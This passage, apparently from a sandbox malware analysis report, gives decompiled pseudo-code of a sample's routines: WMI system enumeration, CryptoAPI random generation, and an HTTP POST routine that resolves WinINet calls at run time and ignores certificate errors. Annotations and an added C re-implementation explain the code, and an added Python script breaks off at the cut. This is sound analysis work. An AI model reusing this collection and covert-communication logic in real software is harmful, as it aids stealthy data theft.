            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 61f11bb46b874e2d381a25acbc75e86c6736a6fab1c11859121ad0a1330ab23a
            • Instruction ID: 18d0a6fe5592e867e94de714990d4f13af5d4bbb00d3e80c99b1bb0a27a9b487
            • Opcode Fuzzy Hash: 61f11bb46b874e2d381a25acbc75e86c6736a6fab1c11859121ad0a1330ab23a
            • Instruction Fuzzy Hash: E8518AB3B041B00BDF688E3E8C642757ED35AD514270EC2B6F8A9CF24AE878C7059760
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 8c95dcdb1e218d760313f10c37e234220c642911b7c79ac4e28ccc8e6cbbe1be
            • Instruction ID: de5a8e1662bcd296ea54ab30b630598b20250a63dc75b0e138749c094740c11f
            • Opcode Fuzzy Hash: 8c95dcdb1e218d760313f10c37e234220c642911b7c79ac4e28ccc8e6cbbe1be
            • Instruction Fuzzy Hash: BD215E366144129BD35CCF2CD8A6A69F3A5FB89310F85427ED51BCB682CB72E452CBC0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 50%
            			E0099EACA(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				char _v24;
            				void* _v28;
            				signed int _v32;
            				char _v36;
            				intOrPtr _v40;
            				signed int _v44;
            				char _v48;
            				char _v52;
            				intOrPtr _v56;
            				signed int _v60;
            				char* _v72;
            				signed short _v80;
            				signed int _v84;
            				char _v88;
            				char _v92;
            				char _v96;
            				intOrPtr _v100;
            				char _v104;
            				char _v616;
            				intOrPtr* _t159;
            				char _t165;
            				signed int _t166;
            				signed int _t173;
            				signed int _t178;
            				signed int _t186;
            				intOrPtr* _t187;
            				signed int _t188;
            				signed int _t192;
            				intOrPtr* _t193;
            				intOrPtr _t200;
            				intOrPtr* _t205;
            				signed int _t207;
            				signed int _t209;
            				intOrPtr* _t210;
            				intOrPtr _t212;
            				intOrPtr* _t213;
            				signed int _t214;
            				char _t217;
            				signed int _t218;
            				signed int _t219;
            				signed int _t230;
            				signed int _t235;
            				signed int _t242;
            				signed int _t243;
            				signed int _t244;
            				signed int _t245;
            				intOrPtr* _t247;
            				intOrPtr* _t251;
            				signed int _t252;
            				intOrPtr* _t253;
            				void* _t255;
            				intOrPtr* _t261;
            				signed int _t262;
            				signed int _t283;
            				signed int _t289;
            				char* _t298;
            				void* _t320;
            				signed int _t322;
            				intOrPtr* _t323;
            				intOrPtr _t324;
            				signed int _t327;
            				intOrPtr* _t328;
            				intOrPtr* _t329;
            
            				_v32 = _v32 & 0x00000000;
            				_v60 = _v60 & 0x00000000;
            				_v56 = __edx;
            				_v100 = __ecx;
            				_t159 = E0099E485(__ecx);
            				_t251 = _t159;
            				_v104 = _t251;
            				if(_t251 == 0) {
            					return _t159;
            				}
            				_t320 = E00998DC9(0x10);
            				_v36 = _t320;
            				_pop(_t255);
            				if(_t320 == 0) {
            					L53:
            					E00998DDF( &_v60, 0xfffffffe);
            					E0099E539( &_v104);
            					return _t320;
            				}
            				_t165 = E00999F85(_t255, 0xcdd);
            				 *_t328 = 0x6b4;
            				_v52 = _t165;
            				_t166 = E00999F85(_t255);
            				_push(0);
            				_push(_v56);
            				_v20 = _t166;
            				_push(_t166);
            				_push(_a4);
            				_t322 = E00999C50(_t165);
            				_v60 = _t322;
            				E00998D9A( &_v52);
            				E00998D9A( &_v20);
            				_t329 = _t328 + 0x20;
            				if(_t322 != 0) {
            					_t323 = __imp__#2; // OLEAUT32 ordinal 2: SysAllocString
            					_v40 =  *_t323(_t322); // BSTR copy of the decrypted query text
            					_t173 = E00999F85(_t255, 0xc93);
            					_v20 = _t173;
            					_v52 =  *_t323(_t173);
            					E00998D9A( &_v20);
            					_t324 = _v40;
            					_t261 =  *_t251;
            					_t252 = 0;
            					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32); // IWbemServices vtable slot 0x50: ExecQuery(strQueryLanguage, strQuery, 0, NULL, &pEnum)
            					__eflags = _t178;
            					if(_t178 != 0) {
            						L52:
            						__imp__#6(_t324); // OLEAUT32 ordinal 6: SysFreeString
            						__imp__#6(_v52);
            						goto L53;
            					}
            					_t262 = _v32;
            					_v28 = 0;
            					_v20 = 0;
            					__eflags = _t262;
            					if(_t262 == 0) {
            						L49:
            						 *((intOrPtr*)( *_t262 + 8))(_t262); // IUnknown slot 8: Release(pEnum)
            						__eflags = _t252;
            						if(_t252 == 0) {
            							E00998DDF( &_v36, 0);
            							_t320 = _v36;
            						} else {
            							 *(_t320 + 8) = _t252;
            							 *_t320 = E00999AB3(_v100);
            							 *((intOrPtr*)(_t320 + 4)) = E00999AB3(_v56);
            						}
            						goto L52;
            					} else {
            						goto L6;
            					}
            					while(1) {
            						L6:
            						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84); // IEnumWbemClassObject slot 0x10: Next(0xea60 = 60000 ms timeout, 1, &pObj, &uReturned)
            						__eflags = _t186;
            						if(_t186 != 0) {
            							break;
            						}
            						_v16 = 0;
            						_v48 = 0;
            						_v12 = 0;
            						_v24 = 0;
            						__eflags = _v84;
            						if(_v84 == 0) {
            							break;
            						}
            						_t187 = _v28;
            							_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24); // IWbemClassObject slot 0x1c: GetNames(NULL, 0x40 = WBEM_FLAG_NONSYSTEM_ONLY, NULL, &names)
            						__eflags = _t188;
            						if(_t188 >= 0) {
            								__imp__#20(_v24, 1,  &_v16); // OLEAUT32 ordinal 20: SafeArrayGetLBound
            								__imp__#19(_v24, 1,  &_v48); // OLEAUT32 ordinal 19: SafeArrayGetUBound
            							_t46 = _t320 + 0xc; // 0xc
            							_t253 = _t46;
            							_t327 = _t252 << 3;
            							_t47 = _t327 + 8; // 0x8
            							_t192 = E00998E5D(_t327, _t47);
            							__eflags = _t192;
            							if(_t192 == 0) {
            									__imp__#16(_v24); // OLEAUT32 ordinal 16: SafeArrayDestroy
            								_t193 = _v28;
            									 *((intOrPtr*)( *_t193 + 8))(_t193); // Release(pObj)
            								L46:
            								_t252 = _v20;
            								break;
            							}
            							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
            							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00998DC9( *(_t327 +  *_t253) << 3);
            							_t200 =  *_t253;
            							__eflags =  *(_t327 + _t200 + 4);
            							if( *(_t327 + _t200 + 4) == 0) {
            								_t136 = _t320 + 0xc; // 0xc
            								E00998DDF(_t136, 0);
            								E00998DDF( &_v36, 0);
            								__imp__#16(_v24);
            								_t205 = _v28;
            								 *((intOrPtr*)( *_t205 + 8))(_t205);
            								_t320 = _v36;
            								goto L46;
            							}
            							_t207 = _v16;
            							while(1) {
            								_v12 = _t207;
            								__eflags = _t207 - _v48;
            								if(_t207 > _v48) {
            									break;
            								}
            								_v44 = _v44 & 0x00000000;
            								_t209 =  &_v12;
            									__imp__#25(_v24, _t209,  &_v44); // OLEAUT32 ordinal 25: SafeArrayGetElement(names, &index, &propName)
            								__eflags = _t209;
            								if(_t209 < 0) {
            									break;
            								}
            								_t212 = E00999AB3(_v44);
            								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
            								_t213 = _v28;
            								_t281 =  *_t213;
            									_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0); // IWbemClassObject slot 0x10: Get(propName, 0, &var, NULL, NULL)
            								__eflags = _t214;
            								if(_t214 < 0) {
            									L39:
            										__imp__#6(_v44); // SysFreeString(propName)
            									_t207 = _v12 + 1;
            									__eflags = _t207;
            									continue;
            								}
            								_v92 = E00999F85(_t281, 0xcc1);
            								 *_t329 = 0xabe;
            								_t217 = E00999F85(_t281);
            								_t283 = _v80;
            								_v96 = _t217;
            									_t218 = _t283 & 0x0000ffff; // V_VT(&var)
            									__eflags = _t218 - 0xb; // 0xb = VT_BOOL; the compare chain below is a switch on the VARIANT type
            								if(__eflags > 0) {
            									_t219 = _t218 - 0x10;
            									__eflags = _t219;
            									if(_t219 == 0) {
            										L35:
            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00998DC9(0x18);
            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
            										__eflags = _t289;
            										if(_t289 == 0) {
            											L38:
            											E00998D9A( &_v92);
            											E00998D9A( &_v96);
            											__imp__#9( &_v80); // OLEAUT32 ordinal 9: VariantClear
            											goto L39;
            										}
            										_push(_v72);
            										_push(L"%d");
            										L37:
            										_push(0xc);
            										_push(_t289);
            										E00999FE4();
            										_t329 = _t329 + 0x10;
            										goto L38;
            									}
            									_t230 = _t219 - 1;
            									__eflags = _t230;
            									if(_t230 == 0) {
            										L33:
            										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00998DC9(0x18);
            										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
            										__eflags = _t289;
            										if(_t289 == 0) {
            											goto L38;
            										}
            										_push(_v72);
            										_push(L"%u");
            										goto L37;
            									}
            									_t235 = _t230 - 1;
            									__eflags = _t235;
            									if(_t235 == 0) {
            										goto L33;
            									}
            									__eflags = _t235 == 1;
            									if(_t235 == 1) {
            										goto L33;
            									}
            									L28:
            									__eflags = _t283 & 0x00002000; // 0x2000 = VT_ARRAY
            									if((_t283 & 0x00002000) == 0) {
            										_v88 = E00999F85(_t283, 0x2a);
            										E00999FE4( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
            										E00998D9A( &_v88);
            										_t329 = _t329 + 0x18;
            										_t298 =  &_v616;
            										L31:
            										_t242 = E00999AB3(_t298);
            										L32:
            										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
            										goto L38;
            									}
            									_t242 = E0099E9AE( &_v80);
            									goto L32;
            								}
            								if(__eflags == 0) { // vt == VT_BOOL
            									__eflags = _v72 - 0xffff; // 0xffff = VARIANT_TRUE
            									_t298 = L"TRUE";
            									if(_v72 != 0xffff) {
            										_t298 = L"FALSE";
            									}
            									goto L31;
            								}
            								_t243 = _t218 - 1;
            								__eflags = _t243;
            								if(_t243 == 0) {
            									goto L38;
            								}
            								_t244 = _t243 - 1;
            								__eflags = _t244;
            								if(_t244 == 0) {
            									goto L35;
            								}
            								_t245 = _t244 - 1;
            								__eflags = _t245;
            								if(_t245 == 0) {
            									goto L35;
            								}
            								__eflags = _t245 != 5;
            								if(_t245 != 5) {
            									goto L28;
            								}
            								_t298 = _v72;
            								goto L31;
            							}
            							__imp__#16(_v24);
            							_t210 = _v28;
            							 *((intOrPtr*)( *_t210 + 8))(_t210);
            							_t252 = _v20;
            							L42:
            							_t262 = _v32;
            							_t252 = _t252 + 1;
            							_v20 = _t252;
            							__eflags = _t262;
            							if(_t262 != 0) {
            								continue;
            							}
            							L48:
            							_t324 = _v40;
            							goto L49;
            						}
            						_t247 = _v28;
            						 *((intOrPtr*)( *_t247 + 8))(_t247);
            						goto L42;
            					}
            					_t262 = _v32;
            					goto L48;
            				} else {
            					E00998DDF( &_v36, _t322);
            					_t320 = _v36;
            					goto L53;
            				}
            			}

            Instruction addresses for the C-code above: 0x0099ead3 to 0x0099ef37 (one entry per decompiled line).


            APIs
              • Part of subcall function 0099E485: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E498
              • Part of subcall function 0099E485: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E4A9
              • Part of subcall function 0099E485: CoCreateInstance.OLE32(009AC8A0,00000000,00000001,009AC8B0,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E4C0
              • Part of subcall function 0099E485: SysAllocString.OLEAUT32(00000000), ref: 0099E4CB
              • Part of subcall function 0099E485: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0099E7B4,00000E16,00000000,00000000,00000005), ref: 0099E4F6
              • Part of subcall function 00998DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00999793,00000100,?,0099661B), ref: 00998DD7
            • SysAllocString.OLEAUT32(00000000), ref: 0099EB73
            • SysAllocString.OLEAUT32(00000000), ref: 0099EB87
            • SysFreeString.OLEAUT32(?), ref: 0099EF0D
            • SysFreeString.OLEAUT32(?), ref: 0099EF16
              • Part of subcall function 00998DDF: HeapFree.KERNEL32(00000000,00000000), ref: 00998E25
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
            • String ID: FALSE$TRUE
            • API String ID: 1290676130-1412513891
            • Opcode ID: 0feb9c066840bc991fd07e48f59d301e1773c1dc61c58ed26b2b407c1e1661d6
            • Instruction ID: dee91dc712e980ffcfece0a8e867b6c7129d8eb4e5b40e062ced844237b2dea3
            • Opcode Fuzzy Hash: 0feb9c066840bc991fd07e48f59d301e1773c1dc61c58ed26b2b407c1e1661d6
            • Instruction Fuzzy Hash: 68E14871E00219AFDF14DFE8C889EAEBBB9FF49300F144559E506AB295DB31AD41CB90
            Uniqueness

            Uniqueness Score: -1.00%
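The subtract-and-compare chain in E0099EACA that starts at `_t218 - 0xb` is a switch on the VARIANT type of each WMI property returned by IWbemClassObject::Get. The example below is added for this page; it is not code from the report or from the sample. It restates that dispatch as a readable C switch, assuming the documented VARENUM values for the constants in the decompile (0xb VT_BOOL, 0x10 VT_I1, 0x11 VT_UI1, 0x12 VT_UI2, 0x13 VT_UI4, 0x2000 VT_ARRAY, 0xffff VARIANT_TRUE), substituting narrow C strings for BSTRs so it builds without Windows headers, and using a placeholder format where the sample formats the type code through a decrypted template (string id 0x2a) whose text is not in the report. The property values in `main` are constructed for illustration, not data from the analysis.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* VARENUM type codes tested by the decompiled compare chain (documented OLE values). */
enum {
    VT_NULL = 1, VT_I2 = 2, VT_I4 = 3, VT_BSTR = 8, VT_BOOL = 11,
    VT_I1 = 16, VT_UI1 = 17, VT_UI2 = 18, VT_UI4 = 19, VT_ARRAY = 0x2000
};
#define VARIANT_TRUE 0xffff   /* the value the sample compares the bool field against */

/* Minimal stand-in for the 16-byte VARIANT: vt at offset 0, value at offset 8,
 * i.e. the _v80 / _v72 pair in the decompile. A narrow C string stands in for
 * the BSTR so this builds without Windows headers (an assumption of this example). */
typedef struct {
    uint16_t vt;
    uint16_t reserved[3];
    union {
        int32_t     lVal;     /* VT_I1 / VT_I2 / VT_I4: sample prints the dword with L"%d" */
        uint32_t    ulVal;    /* VT_UI1 / VT_UI2 / VT_UI4: printed with L"%u" */
        uint16_t    boolVal;  /* VT_BOOL */
        const char *bstrVal;  /* VT_BSTR */
    } u;
} variant_t;

static char *dupstr(const char *s)
{
    size_t n = strlen(s) + 1;
    char *p = malloc(n);
    if (p) memcpy(p, s, n);
    return p;
}

/* Converts one WMI property value the way E0099EACA does. Returns a heap string
 * (caller frees) or NULL where the sample stores nothing for the column: VT_NULL,
 * and VT_ARRAY, which the sample hands to E0099E9AE (not visible in this excerpt). */
char *wmi_value_to_string(const variant_t *v)
{
    char buf[64];
    switch (v->vt) {
    case VT_NULL:
        return NULL;
    case VT_BSTR:
        return dupstr(v->u.bstrVal);                    /* copied verbatim */
    case VT_BOOL:
        return dupstr(v->u.boolVal == VARIANT_TRUE ? "TRUE" : "FALSE");
    case VT_I1: case VT_I2: case VT_I4:
        snprintf(buf, sizeof buf, "%d", (int)v->u.lVal);        /* sample: 12-char buffer, L"%d" */
        return dupstr(buf);
    case VT_UI1: case VT_UI2: case VT_UI4:
        snprintf(buf, sizeof buf, "%u", (unsigned)v->u.ulVal);  /* sample: 12-char buffer, L"%u" */
        return dupstr(buf);
    default:
        if (v->vt & VT_ARRAY)
            return NULL;
        /* Any other type: the sample formats the numeric vt through a decrypted
         * template. Its text is not in the report, so this format is a placeholder. */
        snprintf(buf, sizeof buf, "<vt=%u>", (unsigned)v->vt);
        return dupstr(buf);
    }
}

/* Self-check helper: converts a variant with the given vt and raw 32-bit value and
 * compares the result with expected (NULL meaning "no value stored"). */
int check_conversion(uint16_t vt, uint32_t raw, const char *expected)
{
    variant_t v = {0};
    v.vt = vt;
    v.u.ulVal = raw;
    char *got = wmi_value_to_string(&v);
    int ok = (got == NULL && expected == NULL) ||
             (got != NULL && expected != NULL && strcmp(got, expected) == 0);
    free(got);
    return ok;
}

/* Self-check helper for the BSTR path: the value must be copied, not aliased. */
int check_bstr_copy(const char *text)
{
    variant_t v = {0};
    v.vt = VT_BSTR;
    v.u.bstrVal = text;
    char *got = wmi_value_to_string(&v);
    int ok = got != NULL && got != text && strcmp(got, text) == 0;
    free(got);
    return ok;
}

int main(void)
{
    /* Constructed property values, shaped like one row of a process-class query. */
    const char *names[] = { "Name", "ProcessId", "Enabled", "Description", "Priority" };
    variant_t vals[5] = {0};
    vals[0].vt = VT_BSTR; vals[0].u.bstrVal = "svchost.exe";
    vals[1].vt = VT_UI4;  vals[1].u.ulVal   = 4242;
    vals[2].vt = VT_BOOL; vals[2].u.boolVal = VARIANT_TRUE;
    vals[3].vt = VT_NULL;
    vals[4].vt = VT_I4;   vals[4].u.lVal    = -8;
    for (size_t i = 0; i < 5; i++) {
        char *s = wmi_value_to_string(&vals[i]);
        printf("%s=%s\n", names[i], s ? s : "(no value)");
        free(s);
    }
    return 0;
}
```

Read together with the annotated vtable offsets in the decompile (ExecQuery at 0x50, Next at 0x10, GetNames at 0x1c, Get at 0x10), this is the routine that turns every instance returned by the WMI query into rows of name/value strings, which the caller then stores through the 16-byte object allocated at the top of E0099EACA. The query text (_t322) and the query-language BSTR (string id 0xc93) are decrypted at run time by E00999F85 and are not shown in this excerpt.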

            C-Code - Quality: 30%
            			E009A2951(intOrPtr* _a4) {
            				signed int _v8;
            				_Unknown_base(*)()* _v12;
            				char _v16;
            				_Unknown_base(*)()* _t15;
            				void* _t20;
            				intOrPtr* _t25;
            				intOrPtr* _t29;
            				struct HINSTANCE__* _t30;
            
            				_v8 = _v8 & 0x00000000;
            				_t30 = GetModuleHandleW(L"advapi32.dll");
            				if(_t30 == 0) {
            					L7: // error path: any failed lookup or CryptoAPI call returns 1
            					return 1;
            				}
            				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
            				if(_t25 == 0) {
            					goto L7;
            				}
            				_t15 = GetProcAddress(_t30, "CryptGenRandom");
            				_v12 = _t15;
            				if(_t15 == 0) {
            					goto L7;
            				}
            				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
            				if(_t29 == 0) {
            					goto L7;
            				}
            				_push(0xf0000000); // dwFlags = CRYPT_VERIFYCONTEXT (no persistent key container)
            				_push(1); // dwProvType = PROV_RSA_FULL
            				_push(0); // pszProvider = NULL
            				_push(0); // pszContainer = NULL
            				_push( &_v8); // phProv
            				if( *_t25() == 0) { // CryptAcquireContextA(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)
            					goto L7;
            				}
            				_t20 = _v12(_v8, 4,  &_v16); // CryptGenRandom(hProv, 4, &_v16): four random bytes
            				 *_t29(_v8, 0); // CryptReleaseContext(hProv, 0)
            				if(_t20 == 0) {
            					goto L7;
            				}
            				 *_a4 = E009A28AC( &_v16); // success: the 4 random bytes are passed through E009A28AC and stored via _a4
            				return 0;
            			}

            Instruction addresses for the C-code above: 0x009a2957 to 0x009a29e3 (one entry per decompiled line).


            APIs
            • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,00997C84), ref: 009A2963
            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 009A297B
            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 009A2989
            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 009A2998
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleModule
            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
            • API String ID: 667068680-129414566
            • Opcode ID: f24f45ef940f5f482eb627eea4cf134c8230060967cf4bfd93413664bbcd9e79
            • Instruction ID: c612d1f93ec0fcdda67f95b55a4f9246a507e148dbe68e1a1c8d90d04de777d5
            • Opcode Fuzzy Hash: f24f45ef940f5f482eb627eea4cf134c8230060967cf4bfd93413664bbcd9e79
            • Instruction Fuzzy Hash: 14118232A443197BDB1197BC8D42F9FB6ACAFC6B58F210161FE00EA180DB74DE0086D4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E0099F7A3(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
            				signed int _v8;
            				signed int _v12;
            				char _v16;
            				char _v20;
            				char _v24;
            				intOrPtr _v28;
            				int _v32;
            				signed int _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				char _v56;
            				int _v68;
            				void* _v72;
            				intOrPtr _v92;
            				int _v96;
            				void* _v100;
            				intOrPtr _v104;
            				intOrPtr _v108;
            				char* _v112;
            				char _v116;
            				char _v132;
            				void _v388;
            				void _v644;
            				intOrPtr _t94;
            				intOrPtr _t102;
            				signed int _t104;
            				intOrPtr* _t105;
            				intOrPtr _t110;
            				signed int _t111;
            				signed int _t112;
            				intOrPtr _t115;
            				signed int _t116;
            				char _t117;
            				intOrPtr _t119;
            				char _t122;
            				intOrPtr _t127;
            				signed int _t129;
            				intOrPtr _t135;
            				intOrPtr _t139;
            				intOrPtr _t143;
            				intOrPtr _t145;
            				intOrPtr _t147;
            				intOrPtr _t153;
            				intOrPtr _t155;
            				intOrPtr _t159;
            				void* _t163;
            				signed int _t165;
            				void* _t166;
            				intOrPtr _t179;
            				signed int _t186;
            				char _t188;
            				signed int _t189;
            				void* _t190;
            				char _t193;
            				signed int _t194;
            				signed int _t195;
            				void* _t196;
            
            				_v24 = 4;
            				_v32 = 0;
            				_v28 = 1;
            				_t190 = __edx;
            				memset( &_v388, 0, 0x100);
            				memset( &_v644, 0, 0x100);
            				_t166 = 0x65;
            				_v56 = E00999F6B(_t166);
            				_v52 = E00999F6B(0xcc6);
            				_v48 = E00999F6B(0xe03);
            				_v44 = E00999F6B(0x64c);
            				_t94 = E00999F6B(0x80a);
            				_v36 = _v36 & 0;
            				_t188 = 0x3c;
            				_v40 = _t94;
            				E00998F63( &_v116, 0, 0x100);
            				_v108 = 0x10;
            				_v112 =  &_v132;
            				_v116 = _t188;
            				_v100 =  &_v388;
            				_v96 = 0x100;
            				_v72 =  &_v644;
            				_push( &_v116);
            				_push(0);
            				_v68 = 0x100;
            				_push(E0099A5D0(_t190));
            				_t102 =  *0x9af8f0; // 0x0
            				_push(_t190);
            				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
            					_t104 = 0;
            					__eflags = 0;
            					_v12 = 0;
            					do {
            						_t105 =  *0x9af8f0; // 0x0
            						_v8 = 0x8404f700;
            						_t189 =  *_t105( *0x9af9d8,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
            						__eflags = _t189;
            						if(_t189 != 0) {
            							E0099F73B(_t189);
            							_t110 =  *0x9af8f0; // 0x0
            							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
            							__eflags = _a24;
            							_t165 = _t111;
            							if(_a24 != 0) {
            								E0099A1F8(_a24);
            							}
            							__eflags = _t165;
            							if(_t165 != 0) {
            								__eflags = _v104 - 4;
            								_t112 = 0x8484f700;
            								if(_v104 != 4) {
            									_t112 = _v8;
            								}
            								_t115 =  *0x9af8f0; // 0x0
            								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
            								_v8 = _t116;
            								__eflags = _a24;
            								if(_a24 != 0) {
            									E0099A1F8(_a24);
            									_t116 = _v8;
            								}
            								__eflags = _t116;
            								if(_t116 != 0) {
            									__eflags = _v104 - 4;
            									if(_v104 == 4) {
            										E0099F6E9(_t116);
            									}
            									_t117 = E00999F6B(0x82e);
            									_t193 = _t117;
            									_v16 = _t193;
            									_t119 =  *0x9af8f0; // 0x0
            									_t194 = _v8;
            									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E0099A5D0(_t193), _a4, _a8);
            									E00998D87( &_v16);
            									__eflags = _a24;
            									if(_a24 != 0) {
            										E0099A1F8(_a24);
            									}
            									__eflags = _v8;
            									if(_v8 != 0) {
            										L25:
            										_t122 = 8;
            										_v24 = _t122;
            										_v20 = 0;
            										_v16 = 0;
            										E00998F63( &_v20, 0, _t122);
            										_t127 =  *0x9af8f0; // 0x0
            										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
            										if(__eflags != 0) {
            											_t129 = E0099A102( &_v20, __eflags);
            											__eflags = _t129 - 0xc8;
            											if(_t129 == 0xc8) {
            												 *_a20 = _t194;
            												 *_a12 = _t189;
            												 *_a16 = _t165;
            												__eflags = 0;
            												return 0;
            											}
            											_v12 =  ~_t129;
            											L29:
            											_t135 =  *0x9af8f0; // 0x0
            											 *((intOrPtr*)(_t135 + 8))(_t194);
            											_t195 = _v12;
            											L30:
            											__eflags = _t165;
            											if(_t165 != 0) {
            												_t139 =  *0x9af8f0; // 0x0
            												 *((intOrPtr*)(_t139 + 8))(_t165);
            											}
            											__eflags = _t189;
            											if(_t189 != 0) {
            												_t179 =  *0x9af8f0; // 0x0
            												 *((intOrPtr*)(_t179 + 8))(_t189);
            											}
            											return _t195;
            										}
            										GetLastError();
            										_v12 = 0xfffffff8;
            										goto L29;
            									} else {
            										GetLastError();
            										_t143 =  *0x9af8f0; // 0x0
            										 *((intOrPtr*)(_t143 + 8))(_t194);
            										_t145 =  *0x9af8f0; // 0x0
            										_v8 = _v8 & 0x00000000;
            										 *((intOrPtr*)(_t145 + 8))(_t165);
            										_t147 =  *0x9af8f0; // 0x0
            										_t165 = 0;
            										__eflags = 0;
            										 *((intOrPtr*)(_t147 + 8))(_t189);
            										_t194 = _v8;
            										goto L21;
            									}
            								} else {
            									GetLastError();
            									_t153 =  *0x9af8f0; // 0x0
            									 *((intOrPtr*)(_t153 + 8))(_t165);
            									_t155 =  *0x9af8f0; // 0x0
            									_t165 = 0;
            									 *((intOrPtr*)(_t155 + 8))(_t189);
            									_t189 = 0;
            									_t194 = _v8;
            									goto L22;
            								}
            							} else {
            								GetLastError();
            								_t159 =  *0x9af8f0; // 0x0
            								 *((intOrPtr*)(_t159 + 8))(_t189);
            								L21:
            								_t189 = 0;
            								__eflags = 0;
            								goto L22;
            							}
            						}
            						GetLastError();
            						L22:
            						_t186 = _t194;
            						_t104 = _v12 + 1;
            						_v12 = _t104;
            						__eflags = _t104 - 2;
            					} while (_t104 < 2);
            					__eflags = _t186;
            					if(_t186 != 0) {
            						goto L25;
            					}
            					_t195 = 0xfffffffe;
            					goto L30;
            				}
            				_t163 = 0xfffffffc;
            				return _t163;
            			}
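The routine above never names its networking API: every call goes through a pointer table at 0x9af8f0 plus an offset (consistent with the report's "PE file does not import any functions" and "Contains functionality to dynamically determine API calls" signatures). The argument counts and constants still pin the calls down to WinINet: 0x3c is sizeof(URL_COMPONENTSA), so the 4-argument call at +0x28 is InternetCrackUrlA; the 8-argument call at +0x1c passing 3 (INTERNET_SERVICE_HTTP) is InternetConnectA; the 8-argument call at +0x20 with "POST" is HttpOpenRequestA; 0x13 at +0x0c is HTTP_QUERY_STATUS_CODE for HttpQueryInfoA, whose result is compared with 0xc8 (200). The dwFlags value 0x8404f700 includes INTERNET_FLAG_IGNORE_CERT_CN_INVALID and INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, and INTERNET_FLAG_SECURE (0x00800000) is added only when nScheme (_v104) is 4, INTERNET_SCHEME_HTTPS; the two-iteration loop retries InternetOpenA with dwAccessType 1 and then 4. The Python script below is an added example written for this report, not code from the sample or from Joe Sandbox. It encodes that fingerprinting (parameter count plus distinguishing constants) and decodes the flag words; that the table holds WinINet pointers is an inference from these constants, not something the report states, and all function and variable names in the script are this example's own.

```python
"""WinINet fingerprinting for the run-time resolved calls in E0099F7A3.

Added example for this report; it is not code from the sample or from Joe Sandbox.
Assumption: the function table at 0x9af8f0 holds WinINet pointers. That is an
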